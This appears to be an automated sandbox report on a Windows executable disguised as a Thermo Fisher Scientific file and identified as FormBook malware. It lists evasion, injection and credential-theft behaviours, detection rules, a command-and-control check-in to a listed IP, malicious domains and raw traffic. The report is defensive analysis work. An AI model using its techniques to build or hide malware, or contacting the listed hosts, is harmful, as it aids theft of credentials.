
Windows Analysis Report
Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe

Overview

General Information

Sample name: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe (renamed because original name is a hash value)
Original sample name: Thermo Fisher Scientific - Ajnlatkrs.exe
Analysis ID: 1559710
MD5: dd888983c289f26094548b42ac5b6c85
SHA1: a1893cba8b45a0294340419f03e05140f0b62c3b
SHA256: 3eace816daaec69a4652ce191c0369a0ce5aa933a38d68996e089e8949e46c3d
Tags: exe, HUN, user-smica83

Detection

Malware family: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe" MD5: DD888983C289F26094548B42AC5B6C85)
    • svchost.exe (PID: 748 cmdline: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • uxnRAYhIPZRPiA.exe (PID: 3452 cmdline: "C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 5612 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • uxnRAYhIPZRPiA.exe (PID: 6576 cmdline: "C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Yara matches (memory dumps)
Source | Rule | Description | Author | Strings
00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(3 further entries not shown in this excerpt)

Yara matches (unpacked PE files)
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Sigma matches
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine|base64offset|contains: +!z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ParentImage: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ParentProcessId: 7120, ParentProcessName: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ProcessCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ProcessId: 748, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine|base64offset|contains: +!z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ParentImage: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ParentProcessId: 7120, ParentProcessName: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ProcessCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ProcessId: 748, ProcessName: svchost.exe

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T21:09:18.080157+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.5 | 49793 | 134.0.14.158 | 80 | TCP


                AV Detection

Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ReversingLabs: Detection: 42%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Joe Sandbox ML: detected
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197419615.00000000003AE000.00000002.00000001.01000000.00000005.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3902431291.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_00646CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00646CA9
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_006460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_006460DD
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_006463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_006463F9
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_0064EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0064EB60
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_0064F56F FindFirstFileW,FindClose, 0_2_0064F56F
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_0064F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0064F5FA
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_00651B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00651B2F
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_00651C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00651C8A
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_00651F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00651F94
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 5_2_0015C560 FindFirstFileW,FindNextFileW,FindClose, 5_2_0015C560
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 4x nop then xor eax, eax, 5_2_00149D90
Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 4x nop then mov ebx, 00000004h, 5_2_041904EE

                Networking

Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49793 -> 134.0.14.158:80
Source: DNS query: www.izmirescortg.xyz
Source: DNS query: www.logidant.xyz
Source: DNS query: www.tals.xyz
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, IP Address: 203.161.42.73
Source: Joe Sandbox View, ASN Name: YURTEH-ASUA
Source: Joe Sandbox View, ASN Name: AMAZON-02US
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, Code function: 0_2_00654EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00654EB5
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 20:09:31 GMTserver: Apacheset-cookie: __tad=1732133371.1090000; expires=Sat, 18-Nov-2034 20:09:31 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 
5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 20:09:33 GMTserver: Apacheset-cookie: __tad=1732133373.4553886; expires=Sat, 18-Nov-2034 20:09:33 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 
5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 20:09:36 GMTserver: Apacheset-cookie: __tad=1732133376.4844744; expires=Sat, 18-Nov-2034 20:09:36 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 
5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
